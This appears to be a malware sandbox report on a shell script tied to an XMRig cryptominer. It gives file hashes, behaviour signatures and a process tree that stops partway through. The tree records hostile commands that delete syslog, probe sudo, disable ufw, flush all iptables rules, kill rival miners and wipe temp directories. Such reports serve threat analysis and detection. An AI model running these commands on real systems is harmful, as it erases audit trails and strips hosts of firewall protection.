Resubmissions

09-09-2024 17:01

240909-vjrada1gmd 10

24-01-2024 21:55

240124-1srkdsaadr 10

Analysis

  • max time kernel
    149s
  • max time network
    128s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    09-09-2024 17:01

General

  • Target

    a.sh

  • Size

    6KB

  • MD5

    e97dee2d99e3bd5150abdfb488aafeb8

  • SHA1

    8a9b089a194b383b2202457afa1e0b3ec8fc4d3f

  • SHA256

    f5462666cfd610336545233aba5f6014699d4b07829c856d0b99956075f7331b

  • SHA512

    1d572bc3c7642ea007d441865c879ce4037848210a5194ea1bf262af22e9b84e674c067138531672758e2fbf7a53e82820502736827366d4688180c1f6bcfa25

  • SSDEEP

    192:mRoo5wsIGV7DDf6jlpTWg3vMGQit/3PCd/8PY3+R3YB:mao5wgV7DDf6jlpTWg3vMGQit/3PCd//

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Deletes system logs 1 TTPs 1 IoCs

    Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

  • Flushes firewall rules 3 IoCs

    Flushes/ disables firewall rules inside the Linux kernel.

  • Loads a kernel module 1 IoCs

    Loads a Linux kernel module, potentially to achieve persistence

  • Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

    Abuse sudo or cached sudo credentials to execute code.

  • Disables AppArmor 28 IoCs

    Disables AppArmor security module.

  • Disables SELinux 1 IoCs

    Disables SELinux security module.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Changes its process name 1 IoCs
  • Reads CPU attributes 1 TTPs 14 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/a.sh
    /tmp/a.sh
    1⤵
    • Writes file to tmp directory
    PID:1510
    • /bin/grep
      grep -v grep
      2⤵
        PID:1516
      • /bin/grep
        grep .docker
        2⤵
          PID:1515
        • /bin/ps
          ps aux
          2⤵
          • Reads CPU attributes
          • Reads runtime system information
          PID:1514
        • /usr/bin/sudo
          sudo -n true
          2⤵
          • Abuse Elevation Control Mechanism: Sudo and Sudo Caching
          PID:1517
        • /bin/rm
          rm -rf /tmp/a.sh /tmp/config-err-9v8ijU /tmp/netplan_6o2m7k83 /tmp/snap-private-tmp /tmp/ssh-X651Ud74vhtf /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-MRYxba
          2⤵
            PID:1519
          • /bin/rm
            rm -rf /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-nNGoa6 /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-fmSYoe /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-3TrBTk /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-b8W9ey /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-PIeStI
            2⤵
              PID:1520
            • /bin/rm
              rm -rf /tmp/. /tmp/.. /tmp/.font-unix /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix
              2⤵
                PID:1521
              • /bin/rm
                rm -rf /var/tmp/. /var/tmp/..
                2⤵
                  PID:1522
                • /bin/rm
                  rm -rf /root/.docker.json
                  2⤵
                    PID:1523
                  • /bin/rm
                    rm -rf /root/.xmrig.json
                    2⤵
                      PID:1524
                    • /bin/rm
                      rm -rf /root/.config/docker.json
                      2⤵
                        PID:1525
                      • /bin/rm
                        rm -rf /root/.config/xmrig.json
                        2⤵
                          PID:1526
                        • /usr/bin/pgrep
                          pgrep kdevtmp
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1528
                        • /usr/bin/pgrep
                          pgrep kthreaddk
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1529
                        • /usr/bin/pgrep
                          pgrep kinsing
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1530
                        • /usr/bin/pgrep
                          pgrep solrd
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1531
                        • /usr/bin/pgrep
                          pgrep sidekiq
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1532
                        • /usr/bin/pkill
                          pkill -f kthreaddi
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1536
                        • /usr/bin/pkill
                          pkill -f kdevtmpfsi
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1537
                        • /usr/bin/pkill
                          pkill -f xmrig
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1538
                        • /usr/bin/pkill
                          pkill -f kinsing
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1539
                        • /usr/bin/pkill
                          pkill -f systemdd-dev
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1540
                        • /usr/bin/killall
                          killall -9 .dockerd
                          2⤵
                          • Reads runtime system information
                          PID:1541
                        • /usr/bin/killall
                          killall -9 .docker
                          2⤵
                          • Reads runtime system information
                          PID:1542
                        • /usr/bin/killall
                          killall -9 xmrig
                          2⤵
                          • Reads runtime system information
                          PID:1543
                        • /usr/bin/killall
                          killall -9 kthreaddi
                          2⤵
                          • Reads runtime system information
                          PID:1544
                        • /usr/bin/killall
                          killall -9 kdevtmpfsi
                          2⤵
                            PID:1545
                          • /usr/bin/killall
                            killall -9 kinsing
                            2⤵
                            • Reads runtime system information
                            PID:1546
                          • /usr/bin/killall
                            killall -9 ssrr
                            2⤵
                            • Reads runtime system information
                            PID:1547
                          • /usr/bin/killall
                            killall -9 .dockerd
                            2⤵
                            • Reads runtime system information
                            PID:1548
                          • /usr/bin/killall
                            killall -9 .docker
                            2⤵
                              PID:1549
                            • /usr/bin/killall
                              killall /bin/bash /var/tmp/.dockerd
                              2⤵
                                PID:1550
                              • /usr/bin/killall
                                killall /bin/bash /.docker
                                2⤵
                                  PID:1551
                                • /bin/rm
                                  rm -rf /var/log/syslog
                                  2⤵
                                  • Deletes system logs
                                  PID:1552
                                • /usr/sbin/ufw
                                  ufw disable
                                  2⤵
                                  • Flushes firewall rules
                                  PID:1553
                                  • /sbin/iptables
                                    /sbin/iptables -V
                                    3⤵
                                      PID:1554
                                    • /lib/ufw/ufw-init
                                      /lib/ufw/ufw-init force-stop
                                      3⤵
                                        PID:1555
                                        • /sbin/ip6tables
                                          ip6tables -L INPUT -n
                                          4⤵
                                            PID:1556
                                            • /sbin/modprobe
                                              /sbin/modprobe ip6_tables
                                              5⤵
                                              • Loads a kernel module
                                              • Enumerates kernel/hardware configuration
                                              PID:1557
                                          • /sbin/iptables
                                            iptables -F ufw-logging-deny
                                            4⤵
                                              PID:1561
                                            • /sbin/iptables
                                              iptables -F ufw-logging-allow
                                              4⤵
                                                PID:1564
                                              • /sbin/iptables
                                                iptables -F ufw-not-local
                                                4⤵
                                                  PID:1565
                                                • /sbin/iptables
                                                  iptables -F ufw-user-logging-input
                                                  4⤵
                                                    PID:1566
                                                  • /sbin/iptables
                                                    iptables -F ufw-user-limit-accept
                                                    4⤵
                                                      PID:1567
                                                    • /sbin/iptables
                                                      iptables -F ufw-user-limit
                                                      4⤵
                                                        PID:1568
                                                      • /sbin/iptables
                                                        iptables -F ufw-skip-to-policy-input
                                                        4⤵
                                                          PID:1569
                                                        • /sbin/iptables
                                                          iptables -F ufw-reject-input
                                                          4⤵
                                                            PID:1570
                                                          • /sbin/iptables
                                                            iptables -F ufw-after-logging-input
                                                            4⤵
                                                              PID:1571
                                                            • /sbin/iptables
                                                              iptables -F ufw-after-input
                                                              4⤵
                                                                PID:1572
                                                              • /sbin/iptables
                                                                iptables -F ufw-user-input
                                                                4⤵
                                                                  PID:1573
                                                                • /sbin/iptables
                                                                  iptables -F ufw-before-input
                                                                  4⤵
                                                                    PID:1574
                                                                  • /sbin/iptables
                                                                    iptables -F ufw-before-logging-input
                                                                    4⤵
                                                                      PID:1575
                                                                    • /sbin/iptables
                                                                      iptables -F ufw-skip-to-policy-forward
                                                                      4⤵
                                                                        PID:1576
                                                                      • /sbin/iptables
                                                                        iptables -F ufw-reject-forward
                                                                        4⤵
                                                                          PID:1577
                                                                        • /sbin/iptables
                                                                          iptables -F ufw-after-logging-forward
                                                                          4⤵
                                                                            PID:1578
                                                                          • /sbin/iptables
                                                                            iptables -F ufw-after-forward
                                                                            4⤵
                                                                              PID:1579
                                                                            • /sbin/iptables
                                                                              iptables -F ufw-user-logging-forward
                                                                              4⤵
                                                                                PID:1580
                                                                              • /sbin/iptables
                                                                                iptables -F ufw-user-forward
                                                                                4⤵
                                                                                  PID:1581
                                                                                • /sbin/iptables
                                                                                  iptables -F ufw-before-forward
                                                                                  4⤵
                                                                                    PID:1582
                                                                                  • /sbin/iptables
                                                                                    iptables -F ufw-before-logging-forward
                                                                                    4⤵
                                                                                      PID:1583
                                                                                    • /sbin/iptables
                                                                                      iptables -F ufw-track-forward
                                                                                      4⤵
                                                                                        PID:1584
                                                                                      • /sbin/iptables
                                                                                        iptables -F ufw-track-output
                                                                                        4⤵
                                                                                          PID:1585
                                                                                        • /sbin/iptables
                                                                                          iptables -F ufw-track-input
                                                                                          4⤵
                                                                                            PID:1586
                                                                                          • /sbin/iptables
                                                                                            iptables -F ufw-skip-to-policy-output
                                                                                            4⤵
                                                                                              PID:1587
                                                                                            • /sbin/iptables
                                                                                              iptables -F ufw-reject-output
                                                                                              4⤵
                                                                                                PID:1588
                                                                                              • /sbin/iptables
                                                                                                iptables -F ufw-after-logging-output
                                                                                                4⤵
                                                                                                  PID:1589
                                                                                                • /sbin/iptables
                                                                                                  iptables -F ufw-after-output
                                                                                                  4⤵
                                                                                                    PID:1590
                                                                                                  • /sbin/iptables
                                                                                                    iptables -F ufw-user-logging-output
                                                                                                    4⤵
                                                                                                      PID:1591
                                                                                                    • /sbin/iptables
                                                                                                      iptables -F ufw-user-output
                                                                                                      4⤵
                                                                                                        PID:1592
                                                                                                      • /sbin/iptables
                                                                                                        iptables -F ufw-before-output
                                                                                                        4⤵
                                                                                                          PID:1593
                                                                                                        • /sbin/iptables
                                                                                                          iptables -F ufw-before-logging-output
                                                                                                          4⤵
                                                                                                            PID:1594
                                                                                                          • /sbin/iptables
                                                                                                            iptables -Z ufw-logging-deny
                                                                                                            4⤵
                                                                                                              PID:1595
                                                                                                            • /sbin/iptables
                                                                                                              iptables -Z ufw-logging-allow
                                                                                                              4⤵
                                                                                                                PID:1596
                                                                                                              • /sbin/iptables
                                                                                                                iptables -Z ufw-not-local
                                                                                                                4⤵
                                                                                                                  PID:1597
                                                                                                                • /sbin/iptables
                                                                                                                  iptables -Z ufw-user-logging-input
                                                                                                                  4⤵
                                                                                                                    PID:1598
                                                                                                                  • /sbin/iptables
                                                                                                                    iptables -Z ufw-user-limit-accept
                                                                                                                    4⤵
                                                                                                                      PID:1599
                                                                                                                    • /sbin/iptables
                                                                                                                      iptables -Z ufw-user-limit
                                                                                                                      4⤵
                                                                                                                        PID:1600
                                                                                                                      • /sbin/iptables
                                                                                                                        iptables -Z ufw-skip-to-policy-input
                                                                                                                        4⤵
                                                                                                                          PID:1601
                                                                                                                        • /sbin/iptables
                                                                                                                          iptables -Z ufw-reject-input
                                                                                                                          4⤵
                                                                                                                            PID:1602
                                                                                                                          • /sbin/iptables
                                                                                                                            iptables -Z ufw-after-logging-input
                                                                                                                            4⤵
                                                                                                                              PID:1603
                                                                                                                            • /sbin/iptables
                                                                                                                              iptables -Z ufw-after-input
                                                                                                                              4⤵
                                                                                                                                PID:1604
                                                                                                                              • /sbin/iptables
                                                                                                                                iptables -Z ufw-user-input
                                                                                                                                4⤵
                                                                                                                                  PID:1605
                                                                                                                                • /sbin/iptables
                                                                                                                                  iptables -Z ufw-before-input
                                                                                                                                  4⤵
                                                                                                                                    PID:1606
                                                                                                                                  • /sbin/iptables
                                                                                                                                    iptables -Z ufw-before-logging-input
                                                                                                                                    4⤵
                                                                                                                                      PID:1607
                                                                                                                                    • /sbin/iptables
                                                                                                                                      iptables -Z ufw-skip-to-policy-forward
                                                                                                                                      4⤵
                                                                                                                                        PID:1608
                                                                                                                                      • /sbin/iptables
                                                                                                                                        iptables -Z ufw-reject-forward
                                                                                                                                        4⤵
                                                                                                                                          PID:1609
                                                                                                                                        • /sbin/iptables
                                                                                                                                          iptables -Z ufw-after-logging-forward
                                                                                                                                          4⤵
                                                                                                                                            PID:1610
                                                                                                                                          • /sbin/iptables
                                                                                                                                            iptables -Z ufw-after-forward
                                                                                                                                            4⤵
                                                                                                                                              PID:1611
                                                                                                                                            • /sbin/iptables
                                                                                                                                              iptables -Z ufw-user-logging-forward
                                                                                                                                              4⤵
                                                                                                                                                PID:1612
                                                                                                                                              • /sbin/iptables
                                                                                                                                                iptables -Z ufw-user-forward
                                                                                                                                                4⤵
                                                                                                                                                  PID:1613
                                                                                                                                                • /sbin/iptables
                                                                                                                                                  iptables -Z ufw-before-forward
                                                                                                                                                  4⤵
                                                                                                                                                    PID:1614
                                                                                                                                                  • /sbin/iptables
                                                                                                                                                    iptables -Z ufw-before-logging-forward
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1615
                                                                                                                                                    • /sbin/iptables
                                                                                                                                                      iptables -Z ufw-track-forward
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1616
                                                                                                                                                      • /sbin/iptables
                                                                                                                                                        iptables -Z ufw-track-output
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1617
                                                                                                                                                        • /sbin/iptables
                                                                                                                                                          iptables -Z ufw-track-input
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1618
                                                                                                                                                          • /sbin/iptables
                                                                                                                                                            iptables -Z ufw-skip-to-policy-output
                                                                                                                                                            4⤵
                                                                                                                                                              PID:1619
                                                                                                                                                            • /sbin/iptables
                                                                                                                                                              iptables -Z ufw-reject-output
                                                                                                                                                              4⤵
                                                                                                                                                                PID:1620
                                                                                                                                                              • /sbin/iptables
                                                                                                                                                                iptables -Z ufw-after-logging-output
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:1621
                                                                                                                                                                • /sbin/iptables
                                                                                                                                                                  iptables -Z ufw-after-output
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1622
                                                                                                                                                                  • /sbin/iptables
                                                                                                                                                                    iptables -Z ufw-user-logging-output
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:1623
                                                                                                                                                                    • /sbin/iptables
                                                                                                                                                                      iptables -Z ufw-user-output
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:1624
                                                                                                                                                                      • /sbin/iptables
                                                                                                                                                                        iptables -Z ufw-before-output
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:1625
                                                                                                                                                                        • /sbin/iptables
                                                                                                                                                                          iptables -Z ufw-before-logging-output
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:1626
                                                                                                                                                                          • /sbin/iptables
                                                                                                                                                                            iptables -X ufw-logging-deny
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:1627
                                                                                                                                                                            • /sbin/iptables
                                                                                                                                                                              iptables -X ufw-logging-allow
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1628
                                                                                                                                                                              • /sbin/iptables
                                                                                                                                                                                iptables -X ufw-not-local
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:1629
                                                                                                                                                                                • /sbin/iptables
                                                                                                                                                                                  iptables -X ufw-user-logging-input
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:1630
                                                                                                                                                                                  • /sbin/iptables
                                                                                                                                                                                    iptables -X ufw-user-logging-output
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1631
                                                                                                                                                                                    • /sbin/iptables
                                                                                                                                                                                      iptables -X ufw-user-logging-forward
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:1632
                                                                                                                                                                                      • /sbin/iptables
                                                                                                                                                                                        iptables -X ufw-user-limit-accept
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:1633
                                                                                                                                                                                        • /sbin/iptables
                                                                                                                                                                                          iptables -X ufw-user-limit
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:1634
                                                                                                                                                                                          • /sbin/iptables
                                                                                                                                                                                            iptables -X ufw-user-input
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:1635
                                                                                                                                                                                            • /sbin/iptables
                                                                                                                                                                                              iptables -X ufw-user-forward
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:1636
                                                                                                                                                                                              • /sbin/iptables
                                                                                                                                                                                                iptables -X ufw-user-output
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:1637
                                                                                                                                                                                                • /sbin/iptables
                                                                                                                                                                                                  iptables -X ufw-skip-to-policy-input
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:1638
                                                                                                                                                                                                  • /sbin/iptables
                                                                                                                                                                                                    iptables -X ufw-skip-to-policy-output
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:1639
                                                                                                                                                                                                    • /sbin/iptables
                                                                                                                                                                                                      iptables -X ufw-skip-to-policy-forward
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:1640
                                                                                                                                                                                                      • /sbin/iptables
                                                                                                                                                                                                        iptables -P INPUT ACCEPT
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:1641
                                                                                                                                                                                                        • /sbin/iptables
                                                                                                                                                                                                          iptables -P OUTPUT ACCEPT
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:1642
                                                                                                                                                                                                          • /sbin/iptables
                                                                                                                                                                                                            iptables -P FORWARD ACCEPT
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:1643
                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                              ip6tables -F ufw6-logging-deny
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:1644
                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                ip6tables -F ufw6-logging-allow
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:1645
                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                  ip6tables -F ufw6-not-local
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:1646
                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                    ip6tables -F ufw6-user-logging-input
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:1647
                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                      ip6tables -F ufw6-user-limit-accept
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:1648
                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                        ip6tables -F ufw6-user-limit
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:1649
                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                          ip6tables -F ufw6-skip-to-policy-input
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:1650
                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                            ip6tables -F ufw6-reject-input
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:1651
                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                              ip6tables -F ufw6-after-logging-input
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:1652
                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                ip6tables -F ufw6-after-input
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:1653
                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                  ip6tables -F ufw6-user-input
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:1654
                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                    ip6tables -F ufw6-before-input
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:1655
                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                      ip6tables -F ufw6-before-logging-input
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:1656
                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                        ip6tables -F ufw6-skip-to-policy-forward
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:1657
                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                          ip6tables -F ufw6-reject-forward
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:1658
                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                            ip6tables -F ufw6-after-logging-forward
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:1659
                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                              ip6tables -F ufw6-after-forward
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:1660
                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                ip6tables -F ufw6-user-logging-forward
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:1661
                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                  ip6tables -F ufw6-user-forward
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:1662
                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                    ip6tables -F ufw6-before-forward
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:1663
                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                      ip6tables -F ufw6-before-logging-forward
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:1664
                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                        ip6tables -F ufw6-track-forward
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:1665
                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                          ip6tables -F ufw6-track-output
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:1666
                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                            ip6tables -F ufw6-track-input
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:1667
                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                              ip6tables -F ufw6-skip-to-policy-output
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:1668
                                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                                ip6tables -F ufw6-reject-output
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:1669
                                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                                  ip6tables -F ufw6-after-logging-output
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:1670
                                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                                    ip6tables -F ufw6-after-output
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:1671
                                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                                      ip6tables -F ufw6-user-logging-output
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:1672
                                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                                        ip6tables -F ufw6-user-output
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:1673
                                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                                          ip6tables -F ufw6-before-output
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:1674
                                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                                            ip6tables -F ufw6-before-logging-output
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:1675
                                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                                              ip6tables -Z ufw6-logging-deny
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:1676
                                                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                                                ip6tables -Z ufw6-logging-allow
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:1677
                                                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                                                  ip6tables -Z ufw6-not-local
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:1678
                                                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                                                    ip6tables -Z ufw6-user-logging-input
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:1679
                                                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                                                      ip6tables -Z ufw6-user-limit-accept
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:1680
                                                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                                                        ip6tables -Z ufw6-user-limit
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:1681
                                                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                                                          ip6tables -Z ufw6-skip-to-policy-input
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:1682
                                                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                                                            ip6tables -Z ufw6-reject-input
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:1683
                                                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                                                              ip6tables -Z ufw6-after-logging-input
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:1684
                                                                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                ip6tables -Z ufw6-after-input
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:1685
                                                                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                  ip6tables -Z ufw6-user-input
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:1686
                                                                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                    ip6tables -Z ufw6-before-input
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                      PID:1687
                                                                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                      ip6tables -Z ufw6-before-logging-input
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:1688
                                                                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                        ip6tables -Z ufw6-skip-to-policy-forward
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                          PID:1689
                                                                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                          ip6tables -Z ufw6-reject-forward
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:1690
                                                                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                            ip6tables -Z ufw6-after-logging-forward
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                              PID:1691
                                                                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                              ip6tables -Z ufw6-after-forward
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:1692
                                                                                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                ip6tables -Z ufw6-user-logging-forward
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:1693
                                                                                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                  ip6tables -Z ufw6-user-forward
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                    PID:1694
                                                                                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                    ip6tables -Z ufw6-before-forward
                                                                                                                                                                                                                                                                                                                    4⤵
